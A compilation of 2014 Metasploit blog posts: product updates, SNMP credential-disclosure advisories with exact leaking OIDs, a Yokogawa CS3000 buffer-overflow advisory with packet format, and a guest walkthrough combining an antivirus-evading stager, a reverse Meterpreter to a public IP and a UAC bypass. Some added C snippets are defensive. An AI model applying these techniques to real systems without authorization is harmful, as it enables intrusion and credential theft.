
Earlier this week we heard from ckirsch, Senior Product Marketing Manager for Metasploit at Rapid7, on the pressure penetration testers are facing. (Hint: it's a lot!). With the increase in high profile breaches and their costs, more and more emphasis is being put on the pen tester and security in general. Read on if you'd like to get the top takeaways from this week's webcast so that you aren't left in the dark about, "7 Ways to Make Your Penetration Tests More Productive":

 

  1. Pen testers are in higher demand than ever – Pen testers are extremely highly skilled professionals. Hard to train, harder to find. With the latest developments to PCI enforcing stricter rules around penetration testing methodologies, remediation, and re-testing, pen test costs will be high and the tester's time will be extremely valuable since schedules will book up quickly as organizations clamber to prepare for their audits. This means that security professionals must increase productivity and do more with the same resources, or use expertise in more meaningful ways to get the job done. Increased productivity will allow them to complete more assessments, reduce backlog, enable businesses more quickly, and increase their own market value.
  2. Automation + Scalability = Time Savings – With Metasploit Pro, pen testers can save 45% of their time through many simplified and expedited processes that don't sacrifice quality or thoroughness. You can even set up your own custom workflows to automate additional processes. In particular, the tool allows for automated:
    • Tracking of all data (large sets gathered by both Metasploit and outside sources included!)
    • Baseline pen tests
    • Web app tests
    • Vulnerability validation
    • Post-exploitation modules
    • Social engineering
  3. Reporting is king – Reporting can be the biggest headache when it comes time to pen test your network. Metasploit Pro tracks every action of a pen test for easy audit trails. Some popular reports include compromised hosts, credentials, web app testing, PCI DSS, and FISMA. Features like this allow security professionals to be more efficient and focused fully on their assessment.

 

To learn how your organization can be more secure by making penetration test processes more productive, efficient, scalable, and automated, and to see a demonstration of how each of the 7 tips can be accomplished in Metasploit Pro, view the webcast on-demand now.

The Wireshark DoS Module

 

This week, we have an interesting new module from Metasploit community contributor JoseMi, which exercises a (seeming) denial-of-service (DoS) condition in a Wireshark dissector responsible for decoding CAPWAP packets. No, I've never heard of CAPWAP either, but thanks to Wikipedia's article, now I'm an expert! At any rate, it's not a protocol that you would expect to find really anywhere, given that no real wireless access point supports it yet, and you should certainly not find it on the Internet. If I'm wrong on this, please let me know in the comments. I'd love to know what, if any, devices support this protocol in production.

 

That said, this points out some interesting similarities, and differences, between Wireshark and Metasploit development models. Like Metasploit modules, most Wireshark dissectors come from community contributors, rather than paid, full-time software developers connected to the project. We get plenty of Metasploit modules that target obscure software that most people never run into, and there are a fair amount of Wireshark dissectors like this one; many people only care about the top 10 Metasploit modules, and I expect most people only care about a tiny handful of Wireshark dissectors for their day-to-day. Also like Metasploit modules, by default, you get access to all of Wireshark's dissectors. However, there are a couple of important distinctions to be made here in terms of safety.

 

First, no Metasploit module runs without some kind of assertive action from the user. Second, Metasploit modules tend to be the source of "untrusted user data," while Wireshark tends to be the receiver. While it's not impossible to mess up a Metasploit instance through some honeypot techniques, you have no way of forcing a Metasploit user to attack you. In this respect, Wireshark is much more like a "server" application, while Metasploit tends to be a "client" application.

 

These factors -- along with the usual problems of trusting untrustable data for things like offset calculations -- make Wireshark a delightful target for attackers, based purely on the technical profile. Add to this the likely profile of Wireshark users: network administrators and security people. On top of that, you've got the likely privileges of the Wireshark process -- Wireshark begs you not to run as root, but people do it all the time anyway. This adds up to one of the most attractive targets of opportunity attackers can have.

 

The Wireshark core developers are constantly guarding against unintentionally (or intentionally) backdooring basically everyone's network monitoring infrastructure, and for that we all owe them a massive debt of gratitude. That said, mistakes happen -- even Metasploit ships an occasional bug. While JoseMi's module targets just one DoS condition, this bug came from a fuzzing run that turned out seven other CVE-designated issues. So, not to pick on Wireshark (too much), but if you're interested in contributing to Metasploit, that set of CVEs would be a fine place to start.  The bugs and the patches are public, the protocols involved tend to be pretty well documented, and the payoff for an arbitrary code exec is pretty huge.

 

Incidentally, while this module in particular is "just a DoS," any organization falling victim to this can have some significant degradation of its monitoring capability. And don't forget that the problem is in the dissector, not just Wireshark, so any monitoring that's built on top of TShark (the command line version of Wireshark) is also vulnerable. Figuring out why TShark is crashing can be a frustrating experience, especially if you're also in the middle of another attack.

 

Finally, thanks to the original CAPWAP dissector authors, Alexis and Tanmay, as well as the core Wireshark developer community. This post is absolutely not intended to denigrate your efforts to make Wireshark the most complete packet dissector around -- it's a continuous miracle that open source software development happens at all, let alone at the level of quality that Wireshark achieves. Pretty much everyone I know uses Wireshark routinely, and it's all because of the open source authors like you guys. Thanks.

 

New Modules

We have three new modules this week, including the above-discussed Wireshark DoS module.

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 14-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.

 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes (also last week's).

Where in the world are my shells?

 

A couple weeks back, we published a post module from Tom Sellers which helps out tremendously with geolocating a target computer based on which wireless networks are nearby. Seriously, this module is the bee's knees, and can really help illustrate risk to an organization -- I can imagine scenarios where an attacker has a persistent shell on a company executive's laptop, and can simply use this module (or something like it) to check in on where he spends his time, which is sure to creep said executives out.

 

Now, Tom has a delightful demo showing exactly how one would go about using it -- click below to see his video, which incidentally is the first video added to the soon-to-be-glorious Metasploit Framework Screencasts Youtube channel.

 

geolocate-video-link.png

 

Don't get me wrong, Mubix's Metasploit Minute webcasts are great and recommended for new users to Metasploit, as are many, many of the over 65,000 videos claiming to have something to do with Metasploit. The focus of the Metasploit screencasts channel is, well, simple screencasts of Metasploit Framework that can help illustrate the usage for both old and popular modules as well as some new hotness that may need a little extra explanation. They may also explore some alternate usages of modules that have lots of options. For example, many auxiliary modules have an ACTION list that can change how or why you would use a module, depending on circumstances. Actually demoing in screencast format can help illustrate quickly what those scenarios might be.

 

So, feel free to bug Tom about dropping some voice over audio -- ideally in the baritone tones of a Morgan Freeman mixing board -- to explain what's going on. Or, alternatively, experience this super fun module in all its zaniness with the venerable Benny Hillifier (warning, clicking this link may irritate your co-workers fairly instantly).

 

New Modules

We have five new modules for this week's update -- the three from Rapid7's Deral Heiland which explore default SNMP configurations on popular home and small business routers, which we disclosed late last week, and an exploit against Symantec's enterprise workstation management system, Symantec Workspace Streaming and a SQL injection module against Advantech's product, both by the one and only Juan Vazquez.

 

Exploit modules

 

Auxiliary and post modules

 


 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

(This guest blog comes to us from Louis Sanchez, a Network Systems Specialist that is employed at a Cancer Center in the North East)

 

In late February of this year, I was presented with the opportunity to participate in the new Metasploit Pro Specialist certification pilot. The goal of this new certification was to provide the training required to have a proficient understanding of Metasploit Pro. By providing a baseline of knowledge required to be certified, managers would be able to verify that their employees or potential employees would have the skills required to validate vulnerabilities. When I say vulnerabilities, I do not only mean vulnerabilities from a services or software version standpoint alone, but also from staff education through phishing and website coding by using a web app scanner.

 

When I was first introduced to pen-testing I spent almost all my time in the Metasploit Framework. I still use the framework today and find it an invaluable tool. I have been utilizing Metasploit Pro for over a year now, and it makes providing reports or automation so simple. Like many Rapid7 Metasploit Pro or any software vendor customers, I have had to call support and review some of the inner workings of Metasploit Pro from time to time. Between my framework experience and Pro experience I had a decent basic understanding of how Rapid7's Metasploit Pro worked. So, I agreed to take part in the pilot not only to learn the Metasploit Pro product, but also validate my knowledge. Sometimes it is easy to take for granted how things simply work, but after reviewing the details of how the different components communicate, I have a newfound appreciation for the product. I spent several days reviewing and utilizing resources, such as the administrator guide to learn everything you could want to know about Metasploit Pro. I decided it was time to take the exam, and I passed!

 

After preparing for the certification exam, I learned more about utilizing tags, which has helped me become a more effective Metasploit Pro operator, as I can more meaningfully organize my targets. Also, I learned of several enhancements regarding the web application scanner, which I found to be a great step in the right direction. One of these was that the scanner now allows for URL blacklisting; this really helps prevent an authenticated crawl from accidentally navigating to the log off button. Even though there have been several instances where I have been able to utilize the Metasploit Pro knowledge I gained through my certification, the one that sticks out to me is the OpenSSL vulnerability Heartbleed. I was able to confidently utilize Metasploit Pro with its Nexpose integration to scan and prioritize remediation. As many of us know, not all vulnerabilities can be exploited and therefore it is critical to find the true risks to your organization first. I can say with confidence that taking the time to participate in the Metasploit pilot and become certified was well worth it.

Summary of Vulnerabilities

 

This report details three critical information disclosure vulnerabilities. The vulnerabilities were discovered while Matthew Kienow and I (Deral Heiland) were researching information disclosure issues in SNMP on embedded appliances for a talk at CarolinaCon. During this research project, most devices exposed information that would be classified as benign or public. That said, in three cases we discovered devices that allowed the extraction of authentication data via the read only community string of public. In two cases this was the default behavior. Regarding the impact of these vulnerabilities, casual investigation of public information revealed a large number of the affected devices are exposing SNMP to the public Internet. This data is available from the Shodan search engine.

 

While it can certainly be argued that information disclosure vulnerabilities are simple to resolve and largely the result of poor system configuration and deployment practices, the fact remains that these issues can be exploited to gain access to sensitive information. In practice, the low-hanging fruit are often picked first. And with that, we have three new disclosures to discuss.

The first involves a Brocade load balancer (you might have one of these in your rack). The second and third involve some consumer-grade modems from Ambit (now Ubee) and Netopia (now Motorola). For the modem/routers, you might have one of these at a remote office, warehouse, guest wi-fi network, water treatment plant, etc. They are quite common in office and industrial environments where IT doesn't have a strong presence. Shodan identifies 229,409 Ambit devices exposed to the internet, and 224,544 of the Netopia devices. Of these, 187,000 appear to be in the United States.

Moreover, the tested modems are currently end-of-life, which means that firmware updates to address these insecure defaults are quite unlikely to be released. Of course, just because something is end-of-life doesn't mean it disappears from the Internet -- casual Shodan browsing attests to that. Further, we cannot know if these configurations persist in current, supported offerings from the vendors, but you might want to check yours when you get a chance to download Metasploit.

 

Disclosure Timeline: R7-2014-01 Brocade Load Balancer

 

  • Feb 05, 2014: Initial disclosure to the vendor (Brocade)
  • Feb 20, 2014: Disclosure to CERT/CC
  • Feb 27, 2014: CERT/CC acknowledges receipt (VU#139516)
  • May 16, 2014: Metasploit module published in Pull Request 3365

 

Technical Analysis


 

The Brocade ServerIron ADX 1016-2-PREM, TrafficWork Version 12.5.00T403 application load balancer stores usernames and password hashes within the SNMP MIB tables at the following OID Indexes:

 

  • Username:            1.3.6.1.4.1.1991.1.1.2.9.2.1.1        
  • Password hash:    1.3.6.1.4.1.1991.1.1.2.9.2.1.2

 

The Brocade ServerIron load balancer has SNMP enabled by default. The community string “public” is configured by default. Unless SNMP is disabled, or the public community string is changed, an attacker can easily extract the password hashes for an offline brute force attack.

 

Disclosure Timeline: R7-2014-02 Ubee/Ambit

 

  • Feb 07, 2014: Initial disclosure to the vendor (Ubee)
  • Feb 10, 2014: Phone conference call with Ubee to discuss findings
  • Mar 26, 2014: Disclosed to CERT/CC
  • May 15, 2014: Metasploit module published in Pull Request 3365


Technical Analysis


 

The Ambit U10C019 and Ubee DDW3611 series of cable modems store the following information within the SNMP MIB tables at the following OID Indexes:

 

U10c019

Username:             1.3.6.1.4.1.4684.2.17.1.2.1.1.97.100.109.105.110

Password:              1.3.6.1.4.1.4684.2.17.1.1.1.2.97.100.109.105.110

WEP Keys Index:   1.3.6.1.4.1.4684.2.14.2.5.1.2

WPA PSK:             1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.6

SSID:                     1.3.6.1.4.1.4684.2.14.1.2.0

 

DDW3611

Username:            1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0

Password:            1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0

WEP Key Index:   1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12

WPA PSK:           1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.12

SSID:                  1.3.6.1.4.1.4684.38.2.2.2.1.5.4.1.14.1.3.12

 

By default, SNMP is not enabled on these devices. However, a number of cable providers that utilize Ubee devices currently enable SNMP with the community string of "public" on the uplink side of the cable modem for remote management purposes, making it possible in those cases to enumerate this data over the Internet.

 

 

Disclosure Timeline: R7-2014-03 Motorola/Netopia

  • Feb 07, 2014: Initial disclosure to the vendor (Motorola)
  • Mar 26, 2014: Disclosure to CERT/CC
  • Apr 7, 2014: CERT/CC acknowledges receipt (VU#779628)
  • May 16, 2014: Metasploit module published in Pull Request 3365

Technical Analysis


 

The Netopia 3347 series of DSL modems store the following information within the SNMP MIB tables at the following OID Indexes:

 

  • WEP Keys Index:  1.3.6.1.4.1.304.1.3.1.26.1.15.1.3
  • WPA PSK:             1.3.6.1.4.1.304.1.3.1.26.1.9.1.5.1
  • SSID:                     1.3.6.1.4.1.304.1.3.1.26.1.9.1.2.1

 

SNMP is enabled by default with the community string of “public” on the internal interface of this product. The DSL side is not enabled by default, but a number of DSL providers that still utilize the Netopia 3347 series devices currently enable SNMP with the community string of “public” on the uplink side of the DSL for remote management purposes, making it possible in those cases to enumerate this data over the Internet.
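An added example, not part of the original advisory and not the Metasploit modules' code: a small C checker that scans saved numeric walk output from your own devices and flags lines under the OID subtrees listed in the three analyses above. The function names, the assumed `snmpwalk -On` line format and the sample lines (including the `...2.1.20` near-miss) are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* OID subtrees copied from the three Technical Analysis sections above. */
struct watched_oid { const char *prefix; const char *label; };

static const struct watched_oid WATCHLIST[] = {
    {"1.3.6.1.4.1.1991.1.1.2.9.2.1.1", "Brocade ServerIron ADX: username"},
    {"1.3.6.1.4.1.1991.1.1.2.9.2.1.2", "Brocade ServerIron ADX: password hash"},
    {"1.3.6.1.4.1.4684.2.17.1.2.1.1.97.100.109.105.110", "Ambit U10C019: username"},
    {"1.3.6.1.4.1.4684.2.17.1.1.1.2.97.100.109.105.110", "Ambit U10C019: password"},
    {"1.3.6.1.4.1.4684.2.14.2.5.1.2", "Ambit U10C019: WEP keys"},
    {"1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.6", "Ambit U10C019: WPA PSK"},
    {"1.3.6.1.4.1.4684.2.14.1.2.0", "Ambit U10C019: SSID"},
    {"1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0", "Ubee DDW3611: username"},
    {"1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0", "Ubee DDW3611: password"},
    {"1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12", "Ubee DDW3611: WEP key"},
    {"1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.12", "Ubee DDW3611: WPA PSK"},
    {"1.3.6.1.4.1.4684.38.2.2.2.1.5.4.1.14.1.3.12", "Ubee DDW3611: SSID"},
    {"1.3.6.1.4.1.304.1.3.1.26.1.15.1.3", "Netopia 3347: WEP keys"},
    {"1.3.6.1.4.1.304.1.3.1.26.1.9.1.5.1", "Netopia 3347: WPA PSK"},
    {"1.3.6.1.4.1.304.1.3.1.26.1.9.1.2.1", "Netopia 3347: SSID"},
};
#define WATCH_COUNT (sizeof WATCHLIST / sizeof WATCHLIST[0])

/* Constructed sample in "snmpwalk -On" style; the values are placeholders. */
static const char SAMPLE_WALK[] =
    ".1.3.6.1.2.1.1.5.0 = STRING: \"lab-adx\"\n"
    ".1.3.6.1.4.1.1991.1.1.2.9.2.1.1.1 = STRING: \"admin\"\n"
    ".1.3.6.1.4.1.1991.1.1.2.9.2.1.2.1 = STRING: \"CONSTRUCTED-HASH\"\n"
    ".1.3.6.1.4.1.1991.1.1.2.9.2.1.20.1 = INTEGER: 1\n"
    ".1.3.6.1.4.1.304.1.3.1.26.1.9.1.5.1 = STRING: \"CONSTRUCTED-PSK\"\n";

/* 1 if the OID equals the prefix or lies beneath it. The match must end on a
 * component boundary, so prefix ...2.1.2 does not match ...2.1.20. */
int oid_under(const char *oid, size_t oid_len, const char *prefix)
{
    size_t n = strlen(prefix);
    if (oid_len < n || strncmp(oid, prefix, n) != 0)
        return 0;
    return oid_len == n || oid[n] == '.';
}

/* Returns the watchlist label for one walk line, or NULL if it is not listed. */
const char *classify_line(const char *line)
{
    size_t oid_len, i;
    if (*line == '.')
        line++;                               /* -On output has a leading dot */
    oid_len = strspn(line, "0123456789.");    /* the OID token ends at " = "  */
    if (oid_len == 0)
        return NULL;
    for (i = 0; i < WATCH_COUNT; i++)
        if (oid_under(line, oid_len, WATCHLIST[i].prefix))
            return WATCHLIST[i].label;
    return NULL;
}

/* Counts flagged lines; the report prints the OID and label, never the value. */
int count_exposed(const char *walk, int print_report)
{
    int hits = 0;
    while (*walk != '\0') {
        size_t line_len = strcspn(walk, "\n");
        const char *label = classify_line(walk);
        if (label != NULL) {
            hits++;
            if (print_report) {
                size_t oid_len = strspn(walk, "0123456789.");
                printf("EXPOSED  %-38s %.*s\n", label, (int)oid_len, walk);
            }
        }
        walk += line_len;
        if (*walk == '\n')
            walk++;
    }
    return hits;
}

int main(void)
{
    int hits = count_exposed(SAMPLE_WALK, 1);
    printf("%d sensitive object(s) readable in this walk\n", hits);
    return 0;
}
```

Any hit means the community string used for the walk can read that object, so the remedy is the one the advisory gives: disable SNMP or change the community string.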

 

Exploitation

 

Metasploit auxiliary modules have been developed for extraction of data from these devices via SNMP. The screenshot below shows the use of the brocade_enumhash module.

 

brocade-metasploit.png

Figure 1: Metasploit brocade_enumhash Module

 

If you are curious about your own infrastructure, and would like to use these scanner modules to assess your risk exposure, you're invited to get your free Metasploit download now or update your existing installation. Feel free to comment below if you have any other questions or concerns.

 

 

I would also like to give recognition to my good friend Brenden Morgenthaler. Brenden found a password exposure issue via SNMP in his home cable modem (not one listed in this advisory) in 2012. This piece of information, which he shared with me, led me to further investigate other cable/DSL modem devices as part of this SNMP information exposure research project.

By guest blogger Shane Rudy, Information Security Manager, AOScloud, C|EH | E|CSA | L|PT | CPT | CEPT

 

About a month ago I wrote an article about the new anti-virus evasion capabilities in the latest release of Metasploit Pro 4.9. In this article I'll take this a step further and discuss another related feature: Dynamic Payload generation from the Metasploit Pro console using the auxiliary/pro/generate_dynamic_stager auxiliary module. This module has replaced the older exploit/pro/windows/dynamic_exe module.

 

I’ll discuss using this module in conjunction with the bypassuac memory injection module over a public network scenario. I’m writing this article because it addresses some questions that I have seen posted around the net and have also pondered myself. My aim is to provide you a clearer understanding on the behavior of payloads, stagers and architecture and what to expect when attacking through NAT. Things aren’t always what they seem...

 

In this article you will learn the following:

  • How to use the new auxiliary/pro/generate_dynamic_stager auxiliary module to create your stager executable that will bypass antivirus
  • Issues you could encounter if the proper architecture isn't specified or if you have a mismatch in the exploit target or payload
  • How to use the bypassuac memory injection technique to elevate your privileges on the target
  • How to perform all of the above through NAT

 

*Note: If you're using the free version of Metasploit, the auxiliary/pro/generate_dynamic_stager auxiliary module will not be available. If this is the case, have a look at downloading and using the Veil Framework for AV evasion for your initial payload.


There are a couple of caveats that need to be addressed. First, when you use any of the Metasploit bypassuac modules, the account that your Meterpreter payload is running as needs to be a member of the Administrators group on the target. If you read the documentation on them you should notice this. Second, you may ask, well if my account that Meterpreter is running under already has admin rights then why is this important? It's important for a couple of reasons. First, UAC has multiple modes in which it can run that can hinder your progress. We want to bypass them altogether. Second, if your Meterpreter session doesn’t have elevated rights then you may not get that far depending on your skill set. Many great articles have been written on the elevation of privilege which is outside the scope of this article, but I suggest you read them so you don’t get lazy. A good place to start reading up on the basics is here.


To begin, we have set up a simple network for this exercise that looks like this:

Network.jpeg.jpg

In the scenario above the attacker is located behind a firewall and has been given a public IP address of 74.222.220.166. Port 4444 is open on the external interface of the firewall to allow traffic from the Internet to be forwarded to his attack system located behind the firewall at IP 10.2.0.125.

 

First I will create the initial stager using the new auxiliary/pro/generate_dynamic_stager that replaced the old standalone exploit/pro/windows/dynamic_exe.

I will be using the following version of Metasploit Pro:

version.jpeg.jpg

Next I will load the new dynamic stager auxiliary by typing use auxiliary/pro/generate_dynamic_stager I then configure it once it's loaded as shown:

stager_options.jpeg.jpg

Notice above the ARCH setting is set to x86_64. Most systems these days are 64-bit. If you do not set this and use a 32-bit stager with this exercise you will need to migrate to a 64-bit process or you could see the error Exploit Failed: Rex:: TimeoutError Operation timed out. So just make a mental note that if you see this, more than likely it's because you were using a 64-bit-only piece of Meterpreter functionality while in a 32-bit process space. To avoid issues make sure you know whether you require 64-bit functionality or not. For example, if you're using a 32-bit Meterpreter you will want to migrate up to a 64-bit process if you require something like a memory read using mimikatz on a 64-bit system. This may seem trivial to some of you, but I have seen that error posted a ton on a lot of blogs so I wanted to address it.


Once I type exploit my stager is now ready for the victim. Next I type exploit and the stager executable is created as shown:

generate_stager.jpeg.jpg

Once the stager is created I can upload it to my victim host for testing and demonstrating this proof of concept. In real life this could be a social engineering expedition or some other form of awesome hacktivism (powersploit invoke shellcode anyone?) but for demo purposes this will suffice.

windows.jpeg.jpg

Next I will go back to my attacker box and fire up Metasploit's multi/handler utility as shown:

fireup_multi.jpeg.jpg

Next I will start a listener using Metasploit’s multi/handler utility to handle the inbound connection from the victim machine as shown:

start_listener.jpeg.jpg

Again notice here that I have used the 64-bit version of Meterpreter. I have set my LHOST to 10.2.0.125. This is fine for my first connection. However, as you will see, I will change this IP address to the attacker's public IP address once I set up and execute the bypassuac exploit. Just keep this in the back of your mind for right now.

 

Now I will type exploit and then go to the victim machine and run the stager executable to establish my initial connection and Meterpreter session as shown:

stager_execution.jpeg.jpg

Above you can see that I have established my first session. Now I am going to background this session, but I will use it to launch the bypassuac attack.

background.jpeg.jpg

Next I search Metasploit for bypassuac exploits and I get two hits as shown:

search_bypass.jpeg.jpg

In this exercise I will use the bypassuac_injection exploit. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. My options will be set as shown below. Notice that I have set the session to 1 because that is the first session I established and will use to exploit UAC to gain a second elevated session. I have also created a new Meterpreter payload and set the LHOST setting to the public IP address of the attacker. What is important to note on this, is that when this actually executes, the initial bind to that public IP will look like it fails on the screen and it will be set to 0.0.0.0. But remember how I said that things aren’t what they seem? Even though this happens, that public address will still be written to the payload and connect back to the attacker’s public IP address from the victim sitting behind their corporate firewall with a private IP address behind a NAT.

bypass_injection_options.jpeg.jpg

Now all that is left is to type exploit and I should be good to go.

bypass_exploitation.jpeg.jpg

Notice above that the handler failed to bind to the public IP address and instead started the reverse handler on 0.0.0.0:4444. This is expected. But the exploit succeeds and I now have a new session called session 2 that has been opened. This is the new elevated session. Let’s check this to be sure:

privs.jpeg.jpg

whoami.jpeg.jpg

And there you have it.

 

In this article I introduced you to the new auxiliary/pro/generate_dynamic_stager that replaced the old standalone exploit/pro/windows/dynamic_exe, I demonstrated setting up your Meterpreter payload when dealing with NAT as well as discussing the dreaded Exploit Failed: Rex:: TimeoutError message and finally using the bypassuac injection technique to gain elevated privileges.  I hope you enjoyed this article. --Happy Hackin'.

Meterpreter for All The Platforms

 

This week is pretty exciting for us, since it's not every day we give out commit rights to the Rapid7 Metasploit repo. I'm very happy to report that Tim Wright has agreed to step up and help out with moving Meterpreter research and development forward, focusing mainly on the Java and Android implementations.

 

Many Metasploit users are familiar with Meterpreter for Windows, since it's the default payload for Microsoft systems and effectively the reference implementation. In fact, Metasploit contributor OJ Reeves will be talking about Meterpreter internals on Friday at AusCERT2014, so if you're in the area or otherwise attending, you should certainly check it out.

 

That said, many people also don't know that Meterpreter is more than just a Windows rootkit / backdoor / persistence agent for Windows.  It's a whole protocol and system for interacting with compromised machines, and has always been intended to be cross-platform. Today, we have versions written in POSIX, PHP, Python, and Java/Android. It's that last one that's been getting a lot of attention lately, primarily by community contributors mihi, Anwar, and of course the aforementioned Tim.

 

There are tons and tons of cool new features and boring old bugfixes just waiting to be committed in the many Meterpreters (Meterpreti?), so if you have ideas, or better, a willingness to run through test cases and documentation, or best, code to contribute to make those features a reality, I strongly urge you to get in touch with OJ, Tim, or really anyone from Rapid7, all of whom tend to hang out on the #metasploit channel on Freenode IRC.

 

New Modules

We have two new exploits this week: yet another Flash exploit reverse engineered from yet another 0day found circulating in the wild, and another Yokogawa CS3000 module. Both are thanks to Juan Vazquez.

 

Exploit modules

 


 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

Last March 8th, @julianvilas and I spoke at RootedCON about our work with the Yokogawa CENTUM CS3000 product, and disclosed three of the vulnerabilities we found on March 10 on this blog. As noted in the talk, we intended to release information about all of the vulnerabilities we found in the product at the time. Today, after some negotiation with Yokogawa and ICS-CERT, we're disclosing another of the discovered vulnerabilities, in a network service running by default in CENTUM CS3000 installations. The vendor asked for some extra time to assess and address this vulnerability, which is why we ended up with a slightly laggy disclosure schedule this time.

 

For all of you who weren't able to attend RootedCON, we're just going to quote the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

 

Vulnerability Summary

 

The Yokogawa Centum CS3000 solution uses different services in order to provide all its functionality. The “BKESimmgr.exe” service, started automatically at system startup by default, listens on TCP/34205. By sending a specially crafted packet to port TCP/34205, it’s possible to trigger a stack-based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user.

 

Disclosure Timeline

 

| Date | Description |
|---|---|
| Dec 27, 2013 | Initial disclosure to the vendor, Yokogawa |
| Jan 13, 2014 | Disclosure to CERT/CC |
| Jan 14, 2014 | CERT/CC assigns VU#479196 and forwards details to JPCERT |
| Feb 03, 2014 | CERT/CC confirms JPCERT and ICS-CERT are coordinating the vulnerabilities. ICS-CERT tracking #: ICS-VU-205881. JPCERT tracking #: JVNVU#98181377, JPECERT#98191377 |
| March 6, 2014 | Yokogawa and ICS-CERT ask for an extension for R7-2013-19.2 (this vulnerability) |
| May 9, 2014 | Metasploit module published in Pull Request #3344 |

 

Technical Analysis

 

The vulnerability exists in the function sub_409310 (IDA notation). This function tries to extract data (probably strings) from a user-sent packet. However, it makes insecure use of a memcpy-like function to copy user-controlled data into a fixed-size (64-byte) stack buffer:

 

.text:00409360 loc_409360:                            ; CODE XREF: get_string_sub_409310+42j
.text:00409360                mov    ecx, 10h
.text:00409365                xor    eax, eax
.text:00409367                lea    edi, [esp+50h+var_40]
.text:0040936B                add    esi, edx
.text:0040936D                rep stosd              ; init var_40 with 0x0.
.text:0040936F                mov    ecx, ebx        ; The memcpy length comes from user controlled data
.text:00409371                lea    edi, [esp+50h+var_40] ; destination, var_40 (0x40 bytes buffer)
.text:00409375                mov    edx, ecx
.text:00409377                lea    eax, [esp+50h+var_40]
.text:0040937B                shr    ecx, 2  ; divides the size by 4 because it's using rep movsd, where every movsd is for a double word (4 bytes)
.text:0040937E                rep movsd              ; esi pointing to user controlled data from the packet, leading to overflow








 

The above assembly chunk translates to:

 

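char dst[64];                          /* var_40: fixed 0x40-byte stack buffer */
memset(dst, 0, 64);                    /* rep stosd with ecx = 0x10 */
memcpy(dst, user_data, user_length);   /* no bounds check on user_length */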








 

Where user_data and user_length are user-controlled values.

 

Exploitation

 

It’s possible to reach the vulnerable copy function by sending a specially crafted packet to TCP/34205. According to our understanding, the packet has the following format:

 

| Field | Length |
|---|---|
| Header | 6 bytes |
| Data | Length specified in the header |

 

Where the header structure is:

 

| Field | Length |
|---|---|
| Identifier | 4 bytes |
| Data Length | 2 bytes |

 

A packet with an identifier 0x1 in the header can be used to trigger the vulnerability. For this packet the data structure is:

 

| Field | Length |
|---|---|
| Identifier | 4 bytes |
| Data Length | 2 bytes |
| Data | Data Length bytes |

 

A packet with “0x1” as Identifier in both the Header and the Data can be used to reach the vulnerable function. The Data Length and Data fields can be used to trigger the buffer overflow.
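The bounds check missing from the copy shown in the Technical Analysis, applied to the packet layout described above. This is an added example, not Yokogawa's code or part of the original post; the function names, status codes and little-endian field order are assumptions, and the sample packet is constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define HDR_LEN   6u   /* Identifier (4 bytes) + Data Length (2 bytes) */
#define DST_SIZE  64u  /* size of the stack buffer (var_40) in the analysis */

enum parse_status { PARSE_OK = 0, PARSE_TRUNCATED, PARSE_BAD_ID, PARSE_TOO_LONG };

/* Byte order is not stated on the page; little-endian is an assumption. */
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static uint16_t rd16(const uint8_t *p) {
    return (uint16_t)(p[0] | p[1] << 8);
}

/* Read one Identifier/Data Length pair and check that the announced length
 * fits in the bytes that actually follow it. */
static enum parse_status read_block(const uint8_t *p, size_t avail,
                                    const uint8_t **body, size_t *body_len) {
    if (avail < HDR_LEN) return PARSE_TRUNCATED;
    if (rd32(p) != 0x1u) return PARSE_BAD_ID;
    *body_len = rd16(p + 4);
    if (*body_len > avail - HDR_LEN) return PARSE_TRUNCATED;
    *body = p + HDR_LEN;
    return PARSE_OK;
}

/* Hardened counterpart of memcpy(dst, user_data, user_length): the copy only
 * happens after the length has been checked against the destination size. */
enum parse_status extract_string(const uint8_t *pkt, size_t pkt_len,
                                 char dst[DST_SIZE]) {
    const uint8_t *data, *str;
    size_t data_len, str_len;
    enum parse_status st;

    memset(dst, 0, DST_SIZE);
    if ((st = read_block(pkt, pkt_len, &data, &data_len)) != PARSE_OK) return st;
    if ((st = read_block(data, data_len, &str, &str_len)) != PARSE_OK) return st;
    if (str_len >= DST_SIZE) return PARSE_TOO_LONG;  /* keep room for the NUL */
    memcpy(dst, str, str_len);
    return PARSE_OK;
}

/* Constructed sample: header (id 1, length 11), data (id 1, length 5, "HIS01"). */
int main(void) {
    const uint8_t pkt[] = {1,0,0,0, 11,0, 1,0,0,0, 5,0, 'H','I','S','0','1'};
    char name[DST_SIZE];
    return extract_string(pkt, sizeof pkt, name) == PARSE_OK ? 0 : 1;
}
```

A length that exceeds either the received bytes or the 64-byte destination is rejected before any copy takes place, which is the check absent at loc_409360.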

 

A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50 running on Windows XP SP3 and Windows 2003 SP2 (DEP bypass), where it is possible to gain arbitrary code execution by corrupting the SEH handler stored on the stack:

 

msf exploit(yokogawa_bkesimmgr_bof) > exploit
